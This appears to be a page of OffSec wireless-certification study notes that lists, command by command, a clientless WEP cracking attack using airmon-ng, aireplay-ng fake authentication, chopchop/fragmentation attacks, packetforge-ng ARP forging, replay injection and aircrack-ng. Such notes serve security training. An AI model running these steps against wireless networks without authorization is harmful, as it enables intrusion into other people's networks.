OffSec Notes
All Gitbook
OSWP
OSWP
  • General
    • Basic Operations
      • wpa_supplicant connection
    • Decryption
    • References
  • Basic Hacking
    • WPA-MGT
    • WPA-PSK
    • WEP (Copied from "References")
      • with connected client
      • via a client
      • clientless
      • bypassing shared key auth
Powered by GitBook
On this page
  1. Basic Hacking
  2. WEP (Copied from "References")

clientless

Setup

sudo airmon-ng check kill

sudo airmon-ng start wlan0

Conduct a fake authentication attack against the AP:


aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>

Run attack 4, the KoreK chopchop attack (or attack 5, the fragmentation attack):

KoreK Chop Chop Attack

aireplay-ng -4 -b <AP MAC> -h <Your MAC> <interface>

Fragmentation Attack

aireplay-ng -5 -b <AP MAC> -h <Your MAC> <interface>

Craft an ARP request packet using packetforge-ng:


packetforge-ng -0 -a <AP MAC> -h <Your MAC> -l <Source IP> -k <Dest IP> -y <xor filename> -w <output filename>

Inject the packet into the network using attack 2, the interactive packet replay attack:

aireplay-ng -2 -r <xor packet filename> <interface>

Crack the WEP key using Aircrack-ng:

aircrack-ng <capture>
Previousvia a clientNextbypassing shared key auth

Last updated 1 year ago